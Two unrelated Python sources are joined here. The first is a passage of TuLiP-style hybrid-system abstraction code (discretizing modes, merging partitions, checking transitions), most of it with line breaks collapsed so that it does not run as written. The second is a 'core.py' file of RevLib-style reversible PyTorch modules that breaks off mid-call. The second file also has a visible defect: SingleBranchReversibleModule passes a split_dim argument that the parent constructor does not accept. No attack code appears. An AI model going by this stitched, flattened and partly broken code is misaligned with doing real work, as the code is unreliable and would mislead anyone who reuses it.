hybrid_sys.disc_domain_size # discretize each abstraction separately abstractions = dict() for mode in modes: logger.debug(30*'-'+'\n') logger.info('Abstracting mode: ' + str(mode)) cont_dyn = hybrid_sys.dynamics[mode] absys = discretize( ppp, cont_dyn, **disc_params[mode] ) logger.debug('Mode Abstraction:\n' + str(absys) +'\n') abstractions[mode] = absys # merge their domains (merged_abstr, ap_labeling) = merge_partitions(abstractions) n = len(merged_abstr.ppp) logger.info('Merged partition has: ' + str(n) + ', states') # find feasible transitions over merged partition trans = dict() for mode in modes: cont_dyn = hybrid_sys.dynamics[mode] params = disc_params[mode] trans[mode] = get_transitions( merged_abstr, mode, cont_dyn, N=params['N'], trans_length=params['trans_length'] ) # merge the abstractions, creating a common TS merge_abstractions(merged_abstr, trans, abstractions, modes, mode_nums) if plot: plot_mode_partitions(merged_abstr, show_ts, only_adjacent) return merged_abstr def plot_mode_partitions(swab, show_ts, only_adjacent): """Save each mode's partition and final merged partition. 
""" axs = swab.plot(show_ts, only_adjacent) if not axs: logger.error('failed to plot the partitions.') return n = len(swab.modes) assert(len(axs) == 2*n) # annotate for ax in axs: plot_annot(ax) # save mode partitions for ax, mode in zip(axs[:n], swab.modes): fname = 'merged_' + str(mode) + '.pdf' ax.figure.savefig(fname) # save merged partition for ax, mode in zip(axs[n:], swab.modes): fname = 'part_' + str(mode) + '.pdf' ax.figure.savefig(fname) def plot_annot(ax): fontsize = 5 for tick in ax.xaxis.get_major_ticks(): tick.label1.set_fontsize(fontsize) for tick in ax.yaxis.get_major_ticks(): tick.label1.set_fontsize(fontsize) ax.set_xlabel('$v_1$', fontsize=fontsize+6) ax.set_ylabel('$v_2$', fontsize=fontsize+6) def merge_abstractions(merged_abstr, trans, abstr, modes, mode_nums): """Construct merged transitions. @type merged_abstr: L{AbstractSwitched} @type abstr: dict of L{AbstractPwa} """ # TODO: check equality of atomic proposition sets aps = abstr[modes[0]].ts.atomic_propositions logger.info('APs: ' + str(aps)) sys_ts = trs.FTS() # create stats n = len(merged_abstr.ppp) states = range(n) sys_ts.states.add_from(states) sys_ts.atomic_propositions.add_from(aps) # copy AP labels from regions to discrete states ppp2ts = states for (i, state) in enumerate(ppp2ts): props = merged_abstr.ppp[i].props sys_ts.states[state]['ap'] = props # create mode actions sys_actions = [str(s) for e,s in modes] env_actions = [str(e) for e,s in modes] # no env actions ? if mode_nums[0] == 0: actions_per_mode = { (e,s):{'sys_actions':str(s)} for e,s in modes } sys_ts.sys_actions.add_from(sys_actions) elif mode_nums[1] == 0: # no sys actions actions_per_mode = { (e,s):{'env_actions':str(e)} for e,s in modes } sys_ts.env_actions.add_from(env_actions) else: actions_per_mode = { (e,s):{'env_actions':str(e), 'sys_actions':str(s)} for e,s in modes } sys_ts.env_actions.add_from([str(e) for e,s in modes]) sys_ts.sys_actions.add_from([str(s) for e,s in modes]) for mode in modes: env_sys_actions = actions_per_mode[mode] adj = trans[mode] sys_ts.transitions.add_adj( adj = adj, adj2states = states, **env_sys_actions ) merged_abstr.ts = sys_ts merged_abstr.ppp2ts = ppp2ts def get_transitions( abstract_sys, mode, ssys, N=10, closed_loop=True, trans_length=1 ): """Find which transitions are feasible in given mode. Used for the candidate transitions of the merged partition. @rtype: scipy.sparse.lil_matrix """ logger.info('checking which transitions remain feasible after merging') part = abstract_sys.ppp # Initialize matrix for pairs to check IJ = part.adj.copy() if trans_length > 1: k = 1 while k < trans_length: IJ = np.dot(IJ, part.adj) k += 1 IJ = (IJ > 0).astype(int) # Initialize output n = len(part) transitions = sp.lil_matrix((n, n), dtype=int) # Do the abstraction n_checked = 0 n_found = 0 while np.sum(IJ) > 0: n_checked += 1 ind = np.nonzero(IJ) i = ind[1][0] j = ind[0][0] IJ[j,i] = 0 logger.debug('checking transition: ' + str(i) + ' -> ' + str(j)) si = part[i] sj = part[j] # Use original cell as trans_set trans_set = abstract_sys.ppp2pwa(mode, i)[1] active_subsystem = abstract_sys.ppp2sys(mode, i)[1] trans_feasible = is_feasible( si, sj, active_subsystem, N, closed_loop = closed_loop, trans_set = trans_set ) if trans_feasible: transitions[i, j] = 1 msg = '\t Feasible transition.' n_found += 1 else: transitions[i, j] = 0 msg = '\t Not feasible transition.' 
logger.debug(msg) logger.info('Checked: ' + str(n_checked)) logger.info('Found: ' + str(n_found)) assert n_checked != 0, 'would divide ' logger.info('Survived merging: ' + str(float(n_found) / n_checked) + ' % ') return transitions def multiproc_merge_partitions(abstractions): """LOGTIME in #processors parallel merging. Assuming sufficient number of processors. UNDER DEVELOPMENT; function signature may change without notice. Calling will result in NotImplementedError. """ raise NotImplementedError def merge_partitions(abstractions): """Merge multiple abstractions. @param abstractions: keyed by mode @type abstractions: dict of L{AbstractPwa} @return: (merged_abstraction, ap_labeling) where: - merged_abstraction: L{AbstractSwitched} - ap_labeling: dict """ if len(abstractions) == 0: warnings.warn('Abstractions empty, nothing to merge.') return # consistency check for ab1 in abstractions.values(): for ab2 in abstractions.values(): p1 = ab1.ppp p2 = ab2.ppp if p1.prop_regions != p2.prop_regions: msg = 'merge: partitions have different sets ' msg += 'of continuous propositions' raise Exception(msg) if not (p1.domain.A == p2.domain.A).all() or \ not (p1.domain.b == p2.domain.b).all(): raise Exception('merge: partitions have different domains') # check equality of original PPP partitions if ab1.orig_ppp == ab2.orig_ppp: logger.info('original partitions happen to be equal') init_mode = list(abstractions.keys())[0] all_modes = set(abstractions) remaining_modes = all_modes.difference(set([init_mode])) print('init mode: ' + str(init_mode)) print('all modes: ' + str(all_modes)) print('remaining modes: ' + str(remaining_modes)) # initialize iteration data prev_modes = [init_mode] # Create a list of merged-together regions ab0 = abstractions[init_mode] regions = list(ab0.ppp) parents = {init_mode:list(range(len(regions) ))} ap_labeling = {i:reg.props for i,reg in enumerate(regions)} for cur_mode in remaining_modes: ab2 = abstractions[cur_mode] r = merge_partition_pair( regions, ab2, cur_mode, prev_modes, parents, ap_labeling ) regions, parents, ap_labeling = r prev_modes += [cur_mode] new_list = regions # build adjacency based on spatial adjacencies of # component abstractions. # which justifies the assumed symmetry of part1.adj, part2.adj # Basically, if two regions are either 1) part of the same region in one of # the abstractions or 2) adjacent in one of the abstractions, then the two # regions are adjacent in the switched dynamics. n_reg = len(new_list) adj = np.zeros([n_reg, n_reg], dtype=int) for i, reg_i in enumerate(new_list): for j, reg_j in enumerate(new_list[0:i]): touching = False for mode in abstractions: pi = parents[mode][i] pj = parents[mode][j] part = abstractions[mode].ppp if (part.adj[pi, pj] == 1) or (pi == pj): touching = True break if not touching: continue if pc.is_adjacent(reg_i, reg_j): adj[i,j] = 1 adj[j,i] = 1 adj[i,i] = 1 ppp = PropPreservingPartition( domain=ab0.ppp.domain, regions=new_list, prop_regions=ab0.ppp.prop_regions, adj=adj ) abstraction = AbstractSwitched( ppp=ppp, modes=abstractions, ppp2modes=parents, ) return (abstraction, ap_labeling) def merge_partition_pair( old_regions, ab2, cur_mode, prev_modes, old_parents, old_ap_labeling ): """Merge an Abstraction with the current partition iterate. @param old_regions: A list of C{Region} that is from either: 1. The ppp of the first (initial) L{AbstractPwa} to be merged. 2. 
A list of already-merged regions @type old_regions: list of C{Region} @param ab2: Abstracted piecewise affine dynamics to be merged into the @type ab2: L{AbstractPwa} @param cur_mode: mode to be merged @type cur_mode: tuple @param prev_modes: list of modes that have already been merged together @type prev_modes: list of tuple @param old_parents: dict of modes that have already been merged to dict of indices of new regions to indices of regions @type old_parents: dict of modes to list of region indices in list C{old_regions} or dict of region indices to regions in original ppp for that mode @param old_ap_labeling: dict of states of already-merged modes to sets of propositions for each state @type old_ap_labeling: dict of tuples to sets @return: the following: - C{new_list}, list of new regions - C{parents}, same as input param C{old_parents}, except that it includes the mode that was just merged and for list of regions in return value C{new_list} - C{ap_labeling}, same as input param C{old_ap_labeling}, except that it includes the mode that was just merged. """ logger.info('merging partitions') part2 = ab2.ppp modes = prev_modes + [cur_mode] new_list = [] parents = {mode:dict() for mode in modes} ap_labeling = dict() for i in range(len(old_regions)): for j in range(len(part2)): isect = pc.intersect(old_regions[i], part2[j]) rc, xc = pc.cheby_ball(isect) # no intersection ? if rc < 1e-5: continue logger.info('merging region: A' + str(i) + ', with: B' + str(j)) # if Polytope, make it Region if len(isect) == 0: isect = pc.Region([isect]) # label the Region with propositions isect.props = old_regions[i].props.copy() new_list.append(isect) idx = new_list.index(isect) # keep track of parents for mode in prev_modes: parents[mode][idx] = old_parents[mode][i] parents[cur_mode][idx] = j # union of AP labels from parent states ap_label_1 = old_ap_labeling[i] ap_label_2 = ab2.ts.states[j]['ap'] logger.debug('AP label 1: ' + str(ap_label_1)) logger.debug('AP label 2: ' + str(ap_label_2)) # original partitions may be different if pwa_partition used # but must originate from same initial partition, # i.e., have same continuous propositions, checked above # # so no two intersecting regions can have different AP labels, # checked here if ap_label_1 != ap_label_2: msg = 'Inconsistent AP labels between intersecting regions\n' msg += 'of partitions of switched system.' raise Exception(msg) ap_labeling[idx] = ap_label_1 return new_list, parents, ap_labeling
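# Illustrative usage sketch (the polytopes, matrices and proposition names
# below are placeholders in the style of the TuLiP robot-planning examples,
# not values taken from this module).
if __name__ == '__main__':
    from tulip.abstract import prop2part

    cont_state_space = pc.box2poly([[0., 3.], [0., 2.]])
    cont_props = {
        'home': pc.box2poly([[0., 1.], [0., 1.]]),
        'lot': pc.box2poly([[2., 3.], [1., 2.]]),
    }
    ppp = prop2part(cont_state_space, cont_props)

    A = np.array([[1.0, 0.0], [0.0, 1.0]])
    B = np.array([[0.1, 0.0], [0.0, 0.1]])
    E = np.array([[1.0, 0.0], [0.0, 1.0]])
    U = pc.box2poly([[-1.0, 1.0], [-1.0, 1.0]])      # admissible inputs
    W = pc.box2poly([[-0.01, 0.01], [-0.01, 0.01]])  # disturbance set
    sys_dyn = LtiSysDyn(A, B, E, None, U, W, cont_state_space)

    ab = discretize(ppp, sys_dyn, N=8, min_cell_volume=0.1,
                    closed_loop=True, conservative=False)
    print(ab.ts)  # finite transition system abstracting the dynamics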
core.py
import copy
import enum
import threading
import typing

import torch
import torch.utils.checkpoint

DUAL_OR_QUAD_TENSOR = typing.Union[typing.Tuple[torch.Tensor, torch.Tensor, torch.Tensor, torch.Tensor],
                                   typing.Tuple[torch.Tensor, torch.Tensor]]
TENSOR_OR_LIST = typing.Union[typing.List[torch.Tensor], torch.Tensor]
COUPLING = typing.Callable[[torch.Tensor, TENSOR_OR_LIST], TENSOR_OR_LIST]
FUSED_OPTIMIZER = typing.Optional[typing.Callable[[typing.Iterable], torch.optim.Optimizer]]


class MemoryModes(enum.IntEnum):
    no_savings = 0
    checkpoint = 1
    autograd_graph = 2
    autograd_function = 3


class _ReplaceGrad(torch.autograd.Function):
    @staticmethod
    def forward(ctx, inp0: torch.Tensor, inp1: torch.Tensor, tmp_inp0: torch.Tensor, tmp_inp1: torch.Tensor):
        ctx.save_for_backward(inp0.detach(), inp1.detach())
        return inp0, inp1

    @staticmethod
    def backward(ctx, grad0: torch.Tensor, grad1: torch.Tensor):
        tmp_inp0, tmp_inp1 = ctx.saved_tensors
        return grad0, grad1, tmp_inp0, tmp_inp1


def _set_device(mod: torch.nn.Module, device: str) -> torch.nn.Module:
    if not device:
        return mod
    return copy.deepcopy(mod).to(device, non_blocking=True)


def split_tensor_list(inp: typing.Union[typing.Iterable[torch.Tensor], torch.Tensor]
                      ) -> typing.Union[typing.Tuple[torch.Tensor, typing.List[torch.Tensor]], torch.Tensor]:
    # Plain tensors pass through unchanged; iterables are split into (head, tail).
    if isinstance(inp, torch.Tensor):
        return inp
    if isinstance(inp, typing.Iterable):
        inp = list(inp)
        return inp[0], inp[1:]
    raise ValueError(f"Unsupported Type {type(inp)}")


def take_0th_tensor(inp: typing.Union[typing.Iterable[torch.Tensor], torch.Tensor]) -> torch.Tensor:
    out = split_tensor_list(inp)
    if not isinstance(out, torch.Tensor):
        return out[0]
    return inp


class ReversibleWrapper(torch.nn.Module):
    def __init__(self, wrapped_module: torch.nn.Module, coupling_forward: typing.Optional[COUPLING] = None,
                 coupling_inverse: typing.Optional[COUPLING] = None):
        """
        A handy utility module that allows accessing inverses without rewriting significant amounts of code. This
        module does not do reversibility by itself. It's mostly used as a storage object.
        :param wrapped_module: the module that's supposed to be run in a revnet-like structure
        :param coupling_forward: RevNet uses y0 = (x0 + f(x1)) as a coupling function, but this allows you to set a
        custom one. For example, MomentumNet (https://arxiv.org/abs/2102.07870) uses
        y0 = (beta * x0 + (1 - beta) * f(x1)). The inputs to the coupling function are the residual stream and the
        function output. For more information, look at the examples. default = revnet coupling
        :param coupling_inverse: The inverse of the coupling function.
default = revnet inverse """ super(ReversibleWrapper, self).__init__() self.wrapped_module = wrapped_module self.coupling_forward = coupling_forward or additive_coupling_forward self.coupling_inverse = coupling_inverse or additive_coupling_inverse def forward(self, x0: torch.Tensor, x1: torch.Tensor, *args, **kwargs) -> TENSOR_OR_LIST: return self.coupling_forward(x0, self.wrapped_module(x1, *args, **kwargs)) def inverse(self, y0: torch.Tensor, y1: torch.Tensor, *args, **kwargs) -> TENSOR_OR_LIST: return self.coupling_inverse(y1, self.wrapped_module(y0, *args, **kwargs)) def _optimizer_step(optimizer_step: typing.Optional[typing.Callable[[], None]], module: torch.nn.Module): optimizer_step() module.zero_grad(set_to_none=True) class _ReversibleHalfResidualSwapFn(torch.autograd.Function): @staticmethod def forward(ctx, x0: torch.Tensor, x1: torch.Tensor, back_x0: torch.Tensor, back_x1: torch.Tensor, mod: ReversibleWrapper, target_device: str, cuda: bool, optimizer_step: typing.Optional[typing.Callable[[], None]], args: typing.Iterable, kwargs: dict): ctx.mod = mod ctx.target_device = target_device ctx.forward_rng_state = torch.get_rng_state() ctx.cuda = cuda ctx.optimizer_step = optimizer_step ctx.args = args ctx.kwargs = kwargs if cuda: ctx.cuda_devices, ctx.cuda_states = torch.utils.checkpoint.get_device_states(x0, x1, back_x0, back_x1) out = _set_device(mod, target_device)(x0, x1, *args, **kwargs) out = split_tensor_list(out) if isinstance(out, torch.Tensor): residual = None else: residual = out[1] out = out[0] return x1, out, back_x0, back_x1, residual @staticmethod def backward(ctx, dy0: torch.Tensor, dy1: torch.Tensor, y0: torch.Tensor, y1: torch.Tensor, _unused ) -> typing.Tuple[torch.Tensor, torch.Tensor, torch.Tensor, torch.Tensor, None, None, None, None, None, None]: original_rng_state = torch.get_rng_state() torch.set_rng_state(ctx.forward_rng_state) if dy0 is None: dy0 = torch.zeros_like(y0) if dy1 is None: dy1 = torch.zeros_like(y0) if ctx.cuda: original_cuda_state = torch.utils.checkpoint.get_device_states(dy0, dy1, y0, y1) torch.utils.checkpoint.set_device_states(ctx.cuda_devices, ctx.cuda_states) with torch.enable_grad(): y0 = y0.detach().requires_grad_() y0.retain_grad() new_mod = _set_device(ctx.mod, ctx.target_device) mod_out = take_0th_tensor(new_mod.wrapped_module(y0, *ctx.args, **ctx.kwargs)) with torch.no_grad(): x0 = ctx.mod.coupling_inverse(y1, mod_out.detach()).detach() with torch.enable_grad(): out = ctx.mod.coupling_forward(x0, mod_out) if hasattr(dy1, "thread"): dy1.thread.join() torch.autograd.backward(out, dy1) if ctx.target_device: with torch.no_grad(): for p, new_p in zip(ctx.mod.parameters(), new_mod.parameters()): if new_p.grad is None: continue new_grad = new_p.grad.to(p.device, non_blocking=True) if p.grad is None: p.grad = new_grad continue p.grad.add_(new_grad) if ctx.cuda: torch.utils.checkpoint.set_device_states(*original_cuda_state) torch.set_rng_state(original_rng_state) with torch.enable_grad(): out_grad = ctx.mod.coupling_forward(dy0, y0.grad).detach_() if ctx.optimizer_step is not None: out_grad.thread = threading.Thread(target=_optimizer_step, args=(ctx.optimizer_step, ctx.mod)) out_grad.thread.start() return dy1.detach(), out_grad, x0, y0, None, None, None, None, None, None class TensorOffload(torch.autograd.Function): """ Allows offloading a single tensor to another device, without altering the tensor itself. This is kind of like .to() from pytorch, without forcing the tensor (or parameter!) to stay on the new device forever. 
""" @staticmethod def forward(ctx, inp: torch.Tensor, reference: torch.Tensor): ctx.device = inp.device return inp.to(device=reference.device, non_blocking=True) @staticmethod def backward(ctx, grad_outputs: torch.Tensor): return grad_outputs.to(ctx.device, non_blocking=True), None offload_tensor = TensorOffload.apply replace_grad = _ReplaceGrad.apply reverse_and_swap = _ReversibleHalfResidualSwapFn.apply def additive_coupling_forward(other_stream: torch.Tensor, fn_out: torch.Tensor) -> TENSOR_OR_LIST: fn_out = split_tensor_list(fn_out) if isinstance(fn_out, torch.Tensor): return other_stream + fn_out return [other_stream + fn_out[0]] + fn_out[1] def additive_coupling_inverse(output: torch.Tensor, fn_out: torch.Tensor) -> TENSOR_OR_LIST: fn_out = split_tensor_list(fn_out) if isinstance(fn_out, torch.Tensor): return output - fn_out return [output - fn_out[0]] + fn_out[1] class ReversibleModuleCache: x0: torch.Tensor x1: torch.Tensor def __call__(self, x0: torch.Tensor, x1: torch.Tensor): self.x0 = x0.detach() self.x1 = x1.detach() def get_key(idx: int, inp: torch.Tensor): return f'Index: {idx}\nSize: {inp.size()}\nDevice: {inp.device}\nDataType: {inp.dtype}' class ReversibleModule(torch.nn.Module): cpu_state: torch.Tensor cuda_states: typing.List[torch.Tensor] def __init__(self, wrapped_module: torch.nn.Module, coupling_forward: typing.Optional[COUPLING] = None, coupling_inverse: typing.Optional[COUPLING] = None, memory_savings: bool = True, cache: typing.Optional[ReversibleModuleCache] = None, target_device: str = "", fused_optimizer: FUSED_OPTIMIZER = None): """ A `ReversibleModule` that does the heavy lifting of dispatching to various backends in an effort to avoid storing all intermediate buffers at the same time. It can wrap any module. :param wrapped_module: The one module that's supposed to be wrapped in a reversible way. (You need multiple sequential modules to see memory gains.) :param coupling_forward: RevNet uses y0 = (x0 + f(x1)) as a coupling function, but this allows you to set a custom one. For example, MomentumNet (https://arxiv.org/abs/2102.07870) uses y0 = (beta * x0 + (1 - beta) * f(x1)). The inputs to the coupling function are the residual stream and the function output. For more information, look at the examples. default = revnet couplint :param coupling_inverse: The inverse of the coupling function. default = revnet inverse :param memory_savings: whether to use memory savings or not. disabling results in a revnet that will allocate all intermediate tensors as a normal non-reversible network would. :param cache: an optional cache that's used to store intermediate buffers for the reversible module. if there's no cache, it will fall back to using autograd functions. :param target_device: Specifies where the parameters should be moved to before computing the forward and backward pass. This allows efficient CPU-offloading. default = no offloading (keep parameters on the device they're on) :param fused_optimizer: Allows an optimizer step to run while the model is computing its backward pass. This means that the gradients don't have to be fully instantiated anymore and can improve speed when used with cpu-offload due to asynchronous compute. It expects a function that generates an optimizer from a list of parameters. 
(like Adam.__init__) default = no fused optimizer step """ super(ReversibleModule, self).__init__() self.wrapped_module = ReversibleWrapper(wrapped_module, coupling_forward, coupling_inverse) self.target_device = target_device self.memory_savings = memory_savings self.cache = cache self.cuda_devices = [] self.cuda: bool = torch.cuda._initialized self.autocast: bool = torch.is_autocast_enabled() self.counter: int = 0 self.storage: typing.Dict[str, torch.Tensor] = {} self.input_args = [] self.input_kwargs = {} parameters = list(self.wrapped_module.parameters()) if fused_optimizer is None or not parameters: self.fused_optimizer = None self.fused_optimizer_step = None else: self.fused_optimizer = fused_optimizer(parameters) self.fused_optimizer_step = self.fused_optimizer.step if self.fused_optimizer is not None and not self.memory_savings: raise ValueError("Can't fuse the optimizer if RevLib doesn't modify the training graph!") if self.fused_optimizer is not None and self.cache is not None: raise ValueError("Fused optimizer is not currently supported with checkpointing and autograd-graph.") def pack(self, inp: torch.Tensor) -> str: self.counter += 1 return get_key(self.counter - 1, inp) def inner_pack(self, inp: torch.Tensor): self.storage[get_key(len(self.storage), inp)] = inp def inner_unpack(self, key: str): raise RuntimeError(f'Tensor not found.\nSpec:\n{key}') def unpack(self, key: str) -> torch.Tensor: if self.storage: if key not in self.storage: self.inner_unpack(key) return self.storage[key] x1 = self.cache.x0 y1 = self.cache.x1 with torch.random.fork_rng(self.cuda_devices): torch.set_rng_state(self.cpu_state) if self.cuda: torch.utils.checkpoint.set_device_states(self.cuda_devices, self.cuda_states) with torch.enable_grad(), torch.cuda.amp.autocast(self.autocast): with torch.autograd.graph.saved_tensors_hooks(self.inner_pack, self.inner_unpack): out = self.wrapped_module.wrapped_module(x1, *self.input_args, **self.input_kwargs) x0 = self.wrapped_module.coupling_inverse(y1, take_0th_tensor(out).detach()).detach_() self.cache(x0, x1) with torch.autograd.graph.saved_tensors_hooks(self.inner_pack, self.inner_unpack): _unused = self.wrapped_module.coupling_forward(x0, out) return self.unpack(key) def forward(self, inp: DUAL_OR_QUAD_TENSOR, *args, **kwargs) -> DUAL_OR_QUAD_TENSOR: self.input_args = args self.input_kwargs = kwargs x0, x1, *back = inp self.cpu_state = torch.get_rng_state() if self.cuda: self.cuda_devices, self.cuda_states = torch.utils.checkpoint.get_device_states(*inp) if not self.memory_savings: return x1, self.wrapped_module(x0, x1, *args, **kwargs) if self.cache is None: x0, x1, y0, y1, res = reverse_and_swap(x0, x1, *back, self.wrapped_module, self.target_device, self.cuda, self.fused_optimizer_step, args, kwargs) if res is not None: x1 = [x1] + res return x0, x1, y0, y1 self.counter = 0 self.storage = {} with torch.autograd.graph.saved_tensors_hooks(self.pack, self.unpack): y1 = self.wrapped_module(x0, x1, *args, **kwargs) out = split_tensor_list(y1) if not isinstance(out, torch.Tensor): out = out[0] self.cache(x1, out) return x1, y1 def extra_repr(self) -> str: return '\n'.join([f'coupling_forward={self.wrapped_module.coupling_forward.__name__}', f'coupling_inverse={self.wrapped_module.coupling_inverse.__name__}', f'target_device={self.target_device if self.target_device else None}']) class SingleBranchReversibleModule(ReversibleModule): def __init__(self, secondary_branch_buffer: typing.List[torch.Tensor], wrapped_module: torch.nn.Module, split_dim: int = 1, 
coupling_forward: typing.Optional[COUPLING] = None, coupling_inverse: typing.Optional[COUPLING] = None, memory_savings: bool = True, cache: typing.Optional[ReversibleModuleCache] = None, target_device: str = "", fused_optimizer: FUSED_OPTIMIZER = None, first: bool = False, last: bool = False): """ A wrapper around `ReversibleModule` that hides all additional outputs and pretends the model is still acting the same way it used to. Doing so requires some additional buffers which isn't as efficient as handling the RevNet buffers explicitly, but it allows seamless integration into existing models. :param secondary_branch_buffer: A buffer of tensors that's shared across all instances of `ReversibleModule`, which is used to store additional outputs which aren't returned. :param wrapped_module: The one module that's supposed to be wrapped in a reversible way. (You need multiple sequential modules to see memory gains.) :param split_dim: RevNets require two streams. This parameter specifies which dimension to split in half to create the two streams. `None` would mean the input gets replicated for both streams. It's usually best to split along the features, which is why the default (1) is compatible with convolutions. :param coupling_forward: RevNet uses y0 = (x0 + f(x1)) as a coupling function, but this allows you to set a custom one. For example, MomentumNet (https://arxiv.org/abs/2102.07870) uses y0 = (beta * x0 + (1 - beta) * f(x1)). The inputs to the coupling function are the residual stream and the function output. For more information, look at the examples. default = revnet couplint :param coupling_inverse: The inverse of the coupling function. default = revnet inverse :param memory_savings: whether to use memory savings or not. disabling results in a revnet that will allocate all intermediate tensors as a normal non-reversible network would. :param cache: an optional cache that's used to store intermediate buffers for the reversible module. if there's no cache, it will fall back to using autograd functions. :param target_device: Specifies where the parameters should be moved to before computing the forward and backward pass. This allows efficient CPU-offloading. default = no offloading (keep parameters on the device they're on) :param fused_optimizer: Allows an optimizer step to run while the model is computing its backward pass. This means that the gradients don't have to be fully instantiated anymore and can improve speed when used with cpu-offload due to asynchronous compute. It expects a function that generates an optimizer from a list of parameters. (like Adam.__init__) default = no fused optimizer step :param first: Whether it's the first module of a sequence. If so, it will initialize all buffers and make sure they're passed along. :param last: Whether it's the last module of a sequence. If so, it will run the necessary clean-up procedures to ensure pytorch's autograd will work. 
""" super(SingleBranchReversibleModule, self).__init__(split_dim=split_dim, wrapped_module=wrapped_module, coupling_forward=coupling_forward, coupling_inverse=coupling_inverse, memory_savings=memory_savings, cache=cache, target_device=target_device, fused_optimizer=fused_optimizer) self.secondary_branch_buffer = secondary_branch_buffer self.first = first self.last = last def forward(self, x1: torch.Tensor, *args, **kwargs) -> torch.Tensor: if self.first: self.secondary_branch_buffer.clear() x0 = back0 = torch.zeros_like(x1) back = (back0, back0) else: x0, *back = self.secondary_branch_buffer.pop() _, y1, *back = super(SingleBranchReversibleModule, self).forward((x0, x1, *back), *args, **kwargs) if self.last: if self.memory_savings and self.cache is None: out = out0 = split_tensor_list(y1) if not isinstance(out0, torch.Tensor): out = out0[0] _, out = replace_grad(x1, out, *back) if not isinstance(out0, torch.Tensor): y1 = [out] + out0[1] else: self.secondary_branch_buffer.append([x1] + back) return y1 class MergeCalls(torch.nn.Module): def __init__(self, *modules: SingleBranchReversibleModule, collate_fn: typing.Callable[[torch.Tensor, list], list]): """ MergeCalls acts the same way as nn.Sequential, but allows the usage of a custom collate function which specifies which outputs to return. It also allows arguments and keyword-arguments. Thanks to MergeCalls, it's trivial to integrate MomentumNets into existing sequential models without giving up on the custom tooling built around the models! :param modules: all modules that will be executed sequentially :param collate_fn: collate function that takes in all outputs and returns a list of tensors. """ super(MergeCalls, self).__init__() self.wrapped_modules = torch.nn.ModuleList(modules) self.collate_fn = collate_fn def forward(self, inp: torch.Tensor, *args, **kwargs) -> typing.Union[torch.Tensor, typing.List[torch.Tensor]]: out = [] for mod in self.wrapped_modules: inp = mod(inp, *args, **kwargs) inp = split_tensor_list(inp) if not isinstance(inp, torch.Tensor): out.append([inp[0]] + inp[1]) inp = inp[0] if not out: return inp return self.collate_fn(inp, out) class ReversibleSequential(torch.nn.Sequential): def __init__(self, *modules, split_dim: typing.Optional[int] = 1, coupling_forward: typing.Optional[typing.List[typing.Optional[COUPLING]]] = None, coupling_inverse: typing.Optional[typing.List[typing.Optional[COUPLING]]] = None, memory_mode: MemoryModes = MemoryModes.autograd_function, target_device: str = "", fused_optimizer: FUSED_OPTIMIZER = None): """ Wrapper around `ReversibleModule` that automatically creates a sequential RevNet as introduced in https://arxiv.org/abs/1707.04585 :param modules: All nn.Modules that should be wrapped. It's the same syntax as nn.Sequential, but adds a reversible residual stream. :param split_dim: RevNets require two streams. This parameter specifies which dimension to split in half to create the two streams. `None` would mean the input gets replicated for both streams. It's usually best to split along the features, which is why the default (1) is compatible with convolutions. :param coupling_forward: RevNet uses y0 = (x0 + f(x1)) as a coupling function, but this allows you to set a custom one. For example, MomentumNet (https://arxiv.org/abs/2102.07870) uses y0 = (beta * x0 + (1 - beta) * f(x1)). The inputs to the coupling function are the residual stream and the function output. For more information, look at the examples. 
        default = revnet coupling
        :param coupling_inverse: The inverse of the coupling function. default = revnet inverse
        :param memory_mode: One of `MemoryModes`'s values. Some things are only supported in one mode while others
        might only be supported in another. default = autograd function (highest coverage but spotty XLA support)
        :param target_device: Specifies where the parameters should be moved to before computing the forward and
        backward pass. This allows efficient CPU-offloading. default = no offloading (keep parameters on the device
        they're on)
        :param fused_optimizer: Allows an optimizer step to run while the model is computing its backward pass. This
        means that the gradients don't have to be fully instantiated anymore and can improve speed when used with
        cpu-offload due to asynchronous compute. It expects a function that generates an optimizer from a list of
        parameters. (like Adam.__init__) default = no fused optimizer step
        """
        super(ReversibleSequential, self).__init__()
        coupling_forward = list(coupling_forward) if coupling_forward else [None]
        coupling_inverse = list(coupling_inverse) if coupling_inverse else [None]
        memory_savings = memory_mode != MemoryModes.no_savings
        cache = ReversibleModuleCache() if memory_mode in (MemoryModes.checkpoint,
                                                           MemoryModes.autograd_graph) else None
        self.replace_grad = replace_grad if memory_mode == MemoryModes.autograd_function else lambda *x: x
        for i, m in enumerate(modules):
            if not isinstance(m, ReversibleModule):
                m = ReversibleModule(m, coupling_forward[i % len(coupling_forward)],
                                     coupling_inverse[i % len(coupling_inverse)], memory_savings,
                                     copy.deepcopy(cache) if memory_mode == MemoryModes.checkpoint else cache,
                                     target_device, fused_optimizer)
            self.add_module(f'{i // 2}-{i % 2}', m)
        self.split_dim = split_dim
        self.m = memory_mode

    def forward(self, inp: torch.Tensor, *args,
                layerwise_args_kwargs: typing.Optional[typing.List[typing.Tuple[typing.List[typing.Any],
                                                                                typing.Dict[str, typing.Any]]]] = None,
                **kwargs) -> torch.Tensor:
        if self.split_dim is None:
            inp0 = inp1 = inp
        else:
            inp0, inp1 = inp.chunk(2, self.split_dim)
        zeros = torch.zeros_like(inp0)
        if layerwise_args_kwargs is not None:
            # Merge the shared *args/**kwargs with the per-layer argument lists and keyword dicts.
            args = [list(args) + layer_args for layer_args, _ in layerwise_args_kwargs]
            kwargs = [{**kwargs, **layer_kwargs} for _, layer_kwargs in layerwise_args_kwargs]
        else:
            args = [args] * len(self)
            kwargs = [kwargs] * len(self)
        if not args:
            args = [[]] * len(self)
        if not kwargs:
            kwargs = [{}] * len(self)
        out = inp0, inp1, zeros, zeros
        for mod, arg, kwarg in zip(self, args, kwargs):
            out = mod(out, *arg, **kwarg)
        return torch.cat(self.replace_grad(*out), dim=self.split_dim)
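

# A minimal usage sketch of the classes above (not executed on import).  It builds a
# MomentumNet-style coupling as described in the coupling_forward docstrings; the layer
# sizes and the beta value are arbitrary example choices, not defaults of this module.
def _example_momentum_revnet(channels: int = 64, beta: float = 0.9) -> ReversibleSequential:
    def momentum_coupling_forward(other_stream: torch.Tensor, fn_out: torch.Tensor) -> torch.Tensor:
        # y0 = beta * x0 + (1 - beta) * f(x1)
        return beta * other_stream + (1 - beta) * fn_out

    def momentum_coupling_inverse(output: torch.Tensor, fn_out: torch.Tensor) -> torch.Tensor:
        # x0 = (y0 - (1 - beta) * f(x1)) / beta
        return (output - (1 - beta) * fn_out) / beta

    # ReversibleSequential chunks the input in half along split_dim, so each wrapped
    # module sees channels // 2 features and the concatenated output has `channels` again.
    blocks = [torch.nn.Conv2d(channels // 2, channels // 2, 3, padding=1) for _ in range(4)]
    return ReversibleSequential(*blocks,
                                split_dim=1,
                                coupling_forward=[momentum_coupling_forward],
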